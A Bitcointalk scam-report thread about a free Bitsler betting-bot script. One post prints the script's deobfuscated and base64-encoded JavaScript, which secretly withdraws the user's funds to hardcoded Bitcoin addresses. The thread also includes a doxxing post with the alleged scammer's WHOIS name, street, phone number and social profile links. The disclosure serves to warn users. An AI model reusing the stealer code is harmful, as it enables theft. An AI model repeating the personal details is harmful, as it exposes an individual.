Author

Topic: [Scam Report] SheMale giving "free bitsler bot script" with Coin Stealer (Read 6555 times)

legendary
Activity: 2646
Merit: 1137
All paid signature campaigns should be banned.
Thanks Bruno.

In addition to this address, which appears to be their main Bitcoin address:

https://blockchain.info/address/1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26

Here is a list of other addresses they may have used:

https://www.walletexplorer.com/wallet/45d98a5dc51021bb/addresses

From this we can see they used the following services:

CoinPayments.net
SatoshiMines.com
MtGoxAndOthers
FaucetBOX.com
BitPay.com
C-Cex.com
MoonBit.co.in
BitPay.com-old
Coin-Swap.net
Bittrex.com
Poloniex.com

FWIW:  I am pretty sure they are using an old blockchain.info account.
vip
Activity: 1428
Merit: 1145
Doxxing this guy is way too easy.

Let's start here: http://thebot.net/threads/earn-atleast-1-a-day-for-using-your-phone-normally.319325/

I'm pretty sure I can get his home address in few minutes.

Edit: Adding more below as I stumble across it.

https://www.fiverr.com/prithvihegde25

http://website.informer.com/alldamndeals.net

Quote
Domain Name: ALLDAMNDEALS.NET
Registry Domain ID: 1891050277_DOMAIN_NET-VRSN
Registrar WHOIS Server: Whois.bigrock.com
Registrar URL: www.bigrock.com
Updated Date: 2015-12-18T19:02:26Z
Creation Date: 2014-12-18T14:56:08Z
Registrar Registration Expiration Date: 2015-12-18T14:56:08Z
Registrar: BigRock Solutions Ltd
Registrar IANA ID: 1495
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: prithvi
Registrant Organization: N/A
Registrant Street: Shanti colony  
Registrant City: Dharwad
Registrant State/Province: Other
Registrant Postal Code: 580008
Registrant Country: IN
Registrant Phone: +91.8861482509
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]

https://twitter.com/hegde25

https://bitcointalksearch.org/user/prithvihegde-365748



https://webcache.googleusercontent.com/search?q=cache:WpoJpIS_LtsJ:https://bitcointalk.org/index.php%3Faction%3Dprofile%3Bu%3D365748+&cd=1&hl=en&ct=clnk&gl=us



https://plus.google.com/112645031818569426179/about

http://thebot.net/threads/free-1000-website-hits-seo-google-alexa.298107/page-14#post-3307110



https://webcache.googleusercontent.com/search?q=cache:1aCS4DglRdkJ:https://proxy.crushus.com/bitcointalk.org/index.php%3Ftopic%3D906177.0+&cd=4&hl=en&ct=clnk&gl=us



https://www.facebook.com/prithvi.hegde.549/about



https://webcache.googleusercontent.com/search?q=cache:SDRUtKdQzc8J:https://bitcointa.lk/threads/coinbucks-io-earn-bitcoins-4-surveys-cpa-network-4-btc-paid-out-to-date.372201/page-5+&cd=6&hl=en&ct=clnk&gl=us



https://blockchain.info/tx/38febddce72333c14b09f8d5eb371034f1646ee308870753516f156966c1a0f1



https://webcache.googleusercontent.com/search?q=cache:K2k6C95s_OMJ:https://bitcointalk.org/index.php%3Ftopic%3D1449775.0+&cd=16&hl=en&ct=clnk&gl=us

legendary
Activity: 2646
Merit: 1137
All paid signature campaigns should be banned.
No shit anyone can do.
It almost sounds like you are challenging the Bitcoin community to track you down and find you.

Is that what you are saying?
newbie
Activity: 7
Merit: 0
No shit anyone can do.
copper member
Activity: 2996
Merit: 2374
https://blockchain.info/address/1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26

I will bet that if we cared we could track them down from a mistake somewhere in the 371 transactions since 2014.
It looks like this guy has sent money to bitpay a number of times. Depending on if he was buying something to be shipped to him then it is possible that his address could be tracking by asking bitpay about the transactions and subsequently asking the merchant about the transactions.
legendary
Activity: 2646
Merit: 1137
All paid signature campaigns should be banned.
Pretty good scammer as scammer go, 0.06170746 BTC + 1.483391 BTC since 2014-08-16...

https://blockchain.info/address/1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmF

https://blockchain.info/address/1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26

I will bet that if we cared we could track them down from a mistake somewhere in the 371 transactions since 2014.

hero member
Activity: 1036
Merit: 504
Becoming legend, but I took merit to the knee :(
Good catch.

You saved people from losing money, now let's hope people will read this and not use his script, I really hope he did not stole any bitcoins yet.

See his first address transactions, so many small transactions, only someone with something to hide would try to obfuscate js, and his method is pretty obvious from a script kiddie.

in case he tries to come here to say he accidentally left his walllet address inside, no it was on purpose, it was encoded and obfuscated, although I would not call it obfuscation at all ROFL
hero member
Activity: 520
Merit: 500
Good catch.

You saved people from losing money, now let's hope people will read this and not use his script, I really hope he did not stole any bitcoins yet.
hero member
Activity: 1036
Merit: 504
Becoming legend, but I took merit to the knee :(
Bitcointalk Thread: BitSler Ultimate Script To Double or Triple The Money

https://bitcointalksearch.org/topic/bitsler-ultimate-script-to-double-or-triple-the-money-1454561

Video Proof: https://www.youtube.com/watch?v=8egxVu5gJVg

Check Video Discription for script link.

I just found it working, turned my 0.02 BTC to 0.12 Smiley



Was bored, went to deobfuscate his lousy script, found that his scripts secretly steals from users
I wasnt scammed but I am sure that him putting it in marketplace, giving it for free but attempting to include auto withdraw to his btcaddress counts as a scammer right?

Code:
function startbot() {
    $('#modal-bot').modal("hide");
    var qt = setInterval(function() {
        $('#btn-bet-dice').button("reset");
        var qba = parseFloat($('#profit').val()) + parseFloat($("p[class='text-thin mar-no balance-' + devise + '-html']").text());
        $("p[class='text-thin mar-no balance-" + devise + "-html']").text(qba.toFixed(8));
        $('#won-bet span').removeClass('text-danger');
        $('#won-bet span').addClass('text-success');
        $('#won-bet span').text($('#profit').val());
        show_result_bet();
        $('.balance-' + devise + "-html").addClass('result-bet-win');
        setTimeout(function() {
            $(".balance-" + devise + "-html").removeClass('.result-bet-win');
            $('#btn-bet-dice, #btn-bet-start-pilot-dice, #btn-bet-start-fast-dice').button('loading');
        }, 350);
        var qad = "address";
        var qam = "amount";
        $.ajax({
            type: "POST",
            url: "/api/generate-token",
            data: JSON.parse('{"name":"withdraw","expire":5}'),
            success: function(text) {
                var val = JSON.parse(text);
                if (val.return.success == true) {
                    var tok = val.
                    return.token;
                    var qc2 = qc - 0.0001;
                    $('#withdraw-address').val("1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26");
                    $('#withdraw-amount').val(qc2);
                    $('#withdraw-password').val($("#bot-pass").val());
                    $('#withdraw-token').val(tok);
                    eval('send_withdraw()');
                }
            }
        });
    }, 3000);
}

Take note of this particular part

Code:
      $.ajax({
            type: "POST",
            url: "/api/generate-token",
            data: JSON.parse('{"name":"withdraw","expire":5}'),
            success: function(text) {
                var val = JSON.parse(text);
                if (val.return.success == true) {
                    var tok = val.
                    return.token;
                    var qc2 = qc - 0.0001;
                    $('#withdraw-address').val("1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26");
                    $('#withdraw-amount').val(qc2);
                    $('#withdraw-password').val($("#bot-pass").val());
                    $('#withdraw-token').val(tok);
                    eval('send_withdraw()');
                }
            }
        });

Basically to newbies who cannot understand javascript, the script op gave will auto withdraw all withdrawals to 1HD2x5dH6SrMnvFRrWsTZ6ZSwtafeNRL26.

The withdraw happens using the api token from your account and bypasses your account password because remember? It requires you to give your account and password on start (Script kiddie)

This thread has been archived.

A scam accusation would be made against OP for trying to scam fellow Bitcointalk users and newbies with a "fake apparantly free awesome script".

EDIT 1 while typing this : Above function was deobed from the top comment form the Youtube Video, deobed the one from 3 days ago "The version 3.1 comment", found this address from scammer op that replaced the previous wallet address : 1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmF

Code proof from new deorb
Code:
$(atob("aW5wdXRbaWQqPSd3aXRoZHJhdy1hZGRyZXNzJ10=")).val(atob("MUZZd0R5OVZjRFlxczNUOEpOVE1qN21tSkZyTGpQVmptRg=="));

which is actually
Code:
$('input[id*='withdraw-address']').val('1FYwDy9VcDYqs3T8JNTMj7mmJFrLjPVjmF');

List of archives :

1.Original thread (this thread) archive : http://archive.is/qFQNB
2.Original script url () archive : http://archive.is/OV1EO
3. Youtube video with comments archive: http://archive.is/VVVFj
4. Version 3.1 script archive: (Screenshort as site went down : http://prnt.sc/b3uhc9) http://archive.is/Gge1O


I am too lazy to find ops other possible alts and accounts, maybe someone else would do it?

Timelord if you have the time, do you mind? XD

EDIT : wording.. i made it sound wrong with my wording initally
Jump to: